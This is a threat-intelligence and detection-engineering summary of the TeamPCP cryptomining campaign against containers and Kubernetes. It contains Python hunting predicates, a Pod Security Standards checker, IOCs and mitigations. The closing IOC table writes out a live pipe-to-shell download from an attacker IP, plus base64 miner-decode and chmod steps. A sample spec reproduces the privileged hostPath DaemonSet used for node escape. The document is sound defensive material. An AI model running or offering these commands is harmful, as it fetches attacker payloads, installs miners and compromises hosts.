Linux & Cloud Detection Engineering - TeamPCP Container Attack Scenario
The TeamPCP threat actor targets cloud-native and containerized environments to deploy cryptominers and ransomware. The attack chain involves initial access via web server exploitation, in-memory payload execution, Kubernetes API abuse for lateral movement, and node-level escape using privileged DaemonSets.
Authors: Elastic Security Labs
Source: Elastic Security Labs
- File path: /etc/systemd/system/teampcp-react.service - Systemd service created for persistence.
- URL: hxxp://44[.]252[.]85[.]168:666/files/kube.py - Python script used for Kubernetes lateral movement.
- URL: hxxp://67[.]217[.]57[.]240:666/files/proxy.sh - Initial access payload downloaded and piped to shell.
Key Takeaways
- TeamPCP targets containerized environments, utilizing 'pipe-to-shell' execution to avoid disk artifacts.
- Attackers actively hunt for Kubernetes service account tokens to escalate privileges and move laterally.
- Persistence is attempted via systemd services, which is highly anomalous for standard container lifecycles.
- Node-level escape is achieved by deploying privileged DaemonSets with hostPID, hostNetwork, and hostPath mounts of the node filesystem.
- The attack culminates in the deployment of cryptominers and tunneling tools (gost, frps) for sustained access.
Affected Systems
- Linux
- Docker
- Kubernetes
- Web Servers
Vulnerabilities (CVEs)
- React2Shell
Attack Chain
The attack begins with web server exploitation (React2Shell) or a pipe-to-shell command to gain initial execution inside a container. The attacker kills competing miners and checks for Kubernetes service account tokens to enable lateral movement via a downloaded Python script (kube.py). Persistence is attempted by writing a systemd service, and tunneling tools like gost and frps are installed for C2. Finally, a base64-encoded cryptominer is decoded, made executable, and launched, while the attacker escalates to node control by deploying a privileged DaemonSet.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: Yes
- Other Detection Logic: No
- Platforms: Elastic Defend for Containers (D4C), Elastic Query Language (EQL)
The article provides numerous EQL queries designed for Elastic Defend for Containers (D4C) to detect interactive shell executions, file creations in sensitive paths, package manager abuse, and Kubernetes API anomalies.
Detection Engineering Assessment
- EDR Visibility: High — Container-aware EDRs (like Elastic D4C) can capture process lineage, interactive execution flags, and file modifications within the container context.
- Network Visibility: Medium — Network visibility can detect the downloading of payloads and tunneling activity (gost/frps), but encrypted C2 or internal cluster traffic may be harder to inspect without specific integrations.
- Detection Difficulty: Moderate — While the individual actions (e.g., curl | bash, chmod +x) are highly suspicious in a container context, correlating them across ephemeral workloads and Kubernetes control planes requires mature centralized logging and correlation.
Required Log Sources
- Container Runtime Logs
- Kubernetes Audit Logs
- Process Execution Logs (execve)
- File Creation/Modification Logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for interactive shell processes (e.g., bash, sh) spawned by web servers or network utilities (curl, wget) within a container context. | Process Execution | Initial Access / Execution | Low |
| Search for file creation or modification events in systemd directories (/etc/systemd/system/) originating from inside a container. | File Activity | Persistence | Low |
| Identify package managers (apk, apt, yum) being executed interactively in running containers to install network or shell utilities. | Process Execution | Defense Evasion / Setup | Medium |
| Monitor for the execution of base64 decoding commands (e.g., base64 -d, python -c 'base64.b64decode') piped to interpreters or outputting to executable files in /tmp. | Process Execution | Defense Evasion | Low |
| Detect Kubernetes audit logs showing a service account enumerating secrets or pods across all namespaces, especially using unusual user agents like Python urllib. | Kubernetes Audit Logs | Discovery / Lateral Movement | Low |
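The five hypotheses in the table above, written out as plain Python predicates and run over constructed sample events so the logic can be checked offline. This is an added example, not Elastic's EQL or D4C code, and the sample events are constructed for it rather than captured telemetry. It assumes ECS-style field names for process and file events (container.id, process.name, process.parent.name, process.interactive, process.command_line, file.path, event.action) and the standard Kubernetes audit log shape (verb, objectRef, user.username, userAgent).

```python
from typing import Any, Callable, Dict, List, Tuple

Event = Dict[str, Any]

WEB_SERVERS = {"node", "nginx", "apache2", "httpd", "gunicorn", "uwsgi"}
NET_UTILS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash", "ash"}
PKG_MANAGERS = {"apk", "apt", "apt-get", "yum", "dnf"}
INTERPRETERS = {"sh", "bash", "python", "python3", "perl"}


def in_container(e: Event) -> bool:
    """Assumption: container-scoped events carry container.id; host events do not."""
    return bool(e.get("container", {}).get("id"))


def shell_from_web_or_net_util(e: Event) -> bool:
    """H1: a shell whose parent is a web server (post-exploitation) or curl/wget."""
    p = e.get("process", {})
    return (in_container(e) and p.get("name") in SHELLS
            and p.get("parent", {}).get("name") in (WEB_SERVERS | NET_UTILS))


def interactive_net_util(e: Event) -> bool:
    """Key behavioral indicator: curl/wget executed with the interactive flag set."""
    p = e.get("process", {})
    return in_container(e) and p.get("name") in NET_UTILS and p.get("interactive") is True


def systemd_unit_written(e: Event) -> bool:
    """H2: file creation or modification under /etc/systemd/system/ from inside a container."""
    path = str(e.get("file", {}).get("path", ""))
    return (in_container(e) and e.get("event", {}).get("action") in {"creation", "modification"}
            and path.startswith("/etc/systemd/system/"))


def interactive_pkg_manager(e: Event) -> bool:
    """H3: package manager invoked interactively in a running container."""
    p = e.get("process", {})
    return in_container(e) and p.get("name") in PKG_MANAGERS and p.get("interactive") is True


def base64_decode_to_exec(e: Event) -> bool:
    """H4: base64 decoding that is piped to an interpreter or written into /tmp."""
    cmd = e.get("process", {}).get("command_line", "")
    decodes = "base64 -d" in cmd or "base64 --decode" in cmd or "b64decode(" in cmd
    to_tmp = "> /tmp/" in cmd
    piped = any(f"| {i}" in cmd for i in INTERPRETERS)
    return in_container(e) and decodes and (to_tmp or piped)


def sa_cluster_wide_enum(e: Event) -> bool:
    """H5: a service account lists secrets/pods with no namespace (cluster-wide) from a Python client."""
    ref = e.get("objectRef", {})
    user = e.get("user", {}).get("username", "")
    ua = e.get("userAgent", "").lower()
    return (e.get("verb") == "list" and ref.get("resource") in {"secrets", "pods"}
            and "namespace" not in ref
            and user.startswith("system:serviceaccount:")
            and ("python" in ua or "urllib" in ua))


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("shell_spawned_by_web_or_net_util", shell_from_web_or_net_util),
    ("interactive_curl_or_wget", interactive_net_util),
    ("systemd_unit_written_in_container", systemd_unit_written),
    ("interactive_package_manager", interactive_pkg_manager),
    ("base64_decode_to_tmp_or_interpreter", base64_decode_to_exec),
    ("sa_cluster_wide_enumeration_python_ua", sa_cluster_wide_enum),
]


def hunt(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule_name, event_index) for every event that a rule matches."""
    return [(name, i) for i, e in enumerate(events) for name, pred in RULES if pred(e)]


# Constructed sample events modelled on the command lines listed on this page; not real telemetry.
CTR = {"id": "a1b2c3d4e5f6"}
SAMPLE_EVENTS: List[Event] = [
    {"container": CTR, "process": {"name": "sh", "parent": {"name": "node"},
     "command_line": "sh -c 'curl -fsSL hxxp://67[.]217[.]57[.]240:666/files/proxy.sh | bash'"}},
    {"container": CTR, "process": {"name": "curl", "interactive": True, "parent": {"name": "sh"},
     "command_line": "curl -fsSL hxxp://67[.]217[.]57[.]240:666/files/proxy.sh"}},
    {"container": CTR, "event": {"action": "creation"},
     "file": {"path": "/etc/systemd/system/teampcp-react.service"}},
    {"container": CTR, "process": {"name": "apk", "interactive": True, "parent": {"name": "bash"},
     "command_line": "apk add --no-cache curl bash python3"}},
    {"container": CTR, "process": {"name": "sh", "parent": {"name": "bash"},
     "command_line": "base64 -d /tmp/miner.b64 > /tmp/miner && chmod +x /tmp/miner"}},
    {"verb": "list", "objectRef": {"resource": "secrets"}, "userAgent": "Python-urllib/3.11",
     "user": {"username": "system:serviceaccount:default:default"}},
    # Benign controls: non-interactive apk during an image build; namespaced kubectl list by a human.
    {"container": CTR, "process": {"name": "apk", "interactive": False, "parent": {"name": "sh"},
     "command_line": "apk add --no-cache ca-certificates"}},
    {"verb": "list", "objectRef": {"resource": "pods", "namespace": "kube-system"},
     "userAgent": "kubectl/v1.30.0", "user": {"username": "kubernetes-admin"}},
]

if __name__ == "__main__":
    for rule, idx in hunt(SAMPLE_EVENTS):
        print(f"{rule:40s} event[{idx}]")
```

Each predicate gates on container.id so that the same commands run by an operator on the node itself do not fire, which is where most of the low false-positive rating comes from; the two benign events at the end of the sample set show the interactive flag and the namespace field doing that filtering.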
Control Gaps
- Lack of Kubernetes Audit Log monitoring
- Overprivileged Kubernetes Service Accounts
- Containers running as root or with privileged mode allowed
Key Behavioral Indicators
- Interactive execution flag true for curl/wget
- Process killing (pkill) of known miner names
- chmod +x in world-writable directories (/tmp)
- Creation of privileged DaemonSets with hostPID/hostNetwork and hostPath mounts
False Positive Assessment
- Low. The combination of interactive execution, package manager usage in running containers, and systemd modifications inside containers is highly anomalous for standard production workloads. Package manager use on its own carries medium false-positive risk in clusters where engineers debug inside live containers, as the hypothesis table notes, so it is best used as a correlating signal rather than a standalone alert.
Recommendations
Immediate Mitigation
- Isolate compromised containers and nodes.
- Revoke compromised Kubernetes service account tokens.
- Block known C2 IP addresses (67[.]217[.]57[.]240, 44[.]252[.]85[.]168).
Infrastructure Hardening
- Enforce Kubernetes Pod Security Standards (PSS) through Pod Security Admission to reject privileged pods, hostPID, hostNetwork, and hostPath mounts.
- Enforce least privilege for Kubernetes Service Accounts and ClusterRoles.
- Make container root filesystems read-only where possible.
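A checker for the Pod Security Standards controls the three hardening points above rely on, run against a constructed DaemonSet pod spec shaped like the one this page describes (privileged, hostPID, hostNetwork, hostPath mount of the node root) and against a hardened spec. This is an added example, not Kubernetes' own Pod Security Admission code and not the actor's manifest: it implements only the subset of the baseline and restricted profiles relevant here, the container names, image names and UID are placeholders, and the read-only root filesystem check is this page's recommendation rather than a PSS control.

```python
from typing import Any, Dict, List


def pss_violations(pod_spec: Dict[str, Any], level: str = "restricted") -> List[str]:
    """Return readable violations of a PSS subset; level is 'baseline' or 'restricted'."""
    v: List[str] = []
    # Baseline: host namespaces and hostPath volumes are exactly what the DaemonSet escape needs.
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if pod_spec.get(flag):
            v.append(f"baseline: {flag} must not be true")
    for vol in pod_spec.get("volumes", []):
        if "hostPath" in vol:
            v.append(f"baseline: hostPath volume {vol.get('name')!r} mounts {vol['hostPath'].get('path')!r}")
    pod_sc = pod_spec.get("securityContext", {})
    for c in pod_spec.get("initContainers", []) + pod_spec.get("containers", []):
        sc = c.get("securityContext", {})
        name = c.get("name")
        if sc.get("privileged"):
            v.append(f"baseline: container {name!r} runs privileged")
        if level != "restricted":
            continue
        # Restricted: no privilege escalation, non-root, all capabilities dropped, seccomp enabled.
        if sc.get("allowPrivilegeEscalation") is not False:
            v.append(f"restricted: container {name!r} must set allowPrivilegeEscalation: false")
        if not (sc.get("runAsNonRoot") or pod_sc.get("runAsNonRoot")):
            v.append(f"restricted: container {name!r} must run as non-root")
        if "ALL" not in sc.get("capabilities", {}).get("drop", []):
            v.append(f"restricted: container {name!r} must drop ALL capabilities")
        seccomp = (sc.get("seccompProfile") or pod_sc.get("seccompProfile") or {}).get("type")
        if seccomp not in {"RuntimeDefault", "Localhost"}:
            v.append(f"restricted: container {name!r} needs seccompProfile RuntimeDefault or Localhost")
        # Not a PSS control; the read-only root filesystem recommended on this page.
        if not sc.get("readOnlyRootFilesystem"):
            v.append(f"hardening: container {name!r} should set readOnlyRootFilesystem: true")
    return v


# Constructed pod template spec shaped like the privileged DaemonSet described above (placeholder names).
ATTACKER_DAEMONSET_POD_SPEC: Dict[str, Any] = {
    "hostPID": True,
    "hostNetwork": True,
    "containers": [{
        "name": "node-escape",
        "image": "alpine",
        "securityContext": {"privileged": True},
        "volumeMounts": [{"name": "host-root", "mountPath": "/host"}],
    }],
    "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}],
}

# Constructed hardened spec: no host namespaces, no hostPath, non-root, no escalation, read-only root.
HARDENED_POD_SPEC: Dict[str, Any] = {
    "securityContext": {"runAsNonRoot": True, "runAsUser": 10001,
                        "seccompProfile": {"type": "RuntimeDefault"}},
    "containers": [{
        "name": "app",
        "image": "registry.example/app:1.0",
        "securityContext": {
            "allowPrivilegeEscalation": False,
            "readOnlyRootFilesystem": True,
            "capabilities": {"drop": ["ALL"]},
        },
        "volumeMounts": [{"name": "tmp", "mountPath": "/tmp"}],
    }],
    "volumes": [{"name": "tmp", "emptyDir": {}}],
}

# Namespace labels that make the built-in Pod Security Admission controller reject pods such as
# the DaemonSet's at admission time (enforce) and report older offenders (warn/audit).
PSS_NAMESPACE_LABELS = {
    "pod-security.kubernetes.io/enforce": "restricted",
    "pod-security.kubernetes.io/enforce-version": "latest",
    "pod-security.kubernetes.io/warn": "restricted",
    "pod-security.kubernetes.io/audit": "restricted",
}

if __name__ == "__main__":
    for label, spec in (("attacker", ATTACKER_DAEMONSET_POD_SPEC), ("hardened", HARDENED_POD_SPEC)):
        print(f"== {label}")
        for line in pss_violations(spec) or ["no violations"]:
            print("  " + line)
```

Pods created by a DaemonSet controller still pass through admission, so the enforce label on a namespace blocks this escape route even when the attacker already holds a token that can create DaemonSets there; the remaining gap is any namespace (typically kube-system) that legitimately runs host-namespace workloads and therefore cannot be set to restricted without exemptions, which is where tight ClusterRole scoping for service accounts has to take over.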
User Protection
- Patch web-facing applications against known RCE vulnerabilities (e.g., React2Shell).
Security Awareness
- Train DevOps and engineering teams on the risks of overprivileged containers and the importance of immutable infrastructure.
MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1059.006 - Command and Scripting Interpreter: Python
- T1562.001 - Impair Defenses: Disable or Modify Tools
- T1613 - Container and Resource Discovery
- T1543.002 - Create or Modify System Process: Systemd Service
- T1090 - Proxy
- T1140 - Deobfuscate/Decode Files or Information
- T1611 - Escape to Host
- T1496 - Resource Hijacking
Additional IOCs
- Domains:
  update[.]aegis[.]aliyun[.]com - Domain used to download uninstall script for competing tools.
- Urls:
  hxxp://update[.]aegis[.]aliyun[.]com/download/uninstall.sh - Script to uninstall competing security/mining tools.
- File Paths:
  /tmp/k8s.py - Downloaded kube.py script
  /tmp/miner.b64 - Base64 encoded miner payload
  /tmp/miner - Decoded executable miner
  /opt/teampcp - Directory used for tunneling tools
  /var/run/secrets/kubernetes.io/serviceaccount/token - Targeted for K8s discovery
- Command Lines:

| Purpose | Tools | Stage | Command |
|---|---|---|---|
| Download and execute initial payload in memory | curl, bash | Initial Access / Execution | curl -fsSL http://67.217.57.240:666/files/proxy.sh \| bash |
| Kill competing cryptominers | pkill | Defense Evasion | pkill -9 xmrig |
| Check for Kubernetes service account token | sh | Discovery | if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ] |
| Install required tooling dynamically | apk | Defense Evasion / Setup | apk add --no-cache curl bash python3 |
| Decode base64 payload | python3, base64 | Defense Evasion | python3 -c "exec(base64.b64decode( (command truncated as published) |
| Decode and execute miner | sh, base64, chmod | Execution / Impact | base64 -d /tmp/miner.b64 > /tmp/miner && chmod +x /tmp/miner |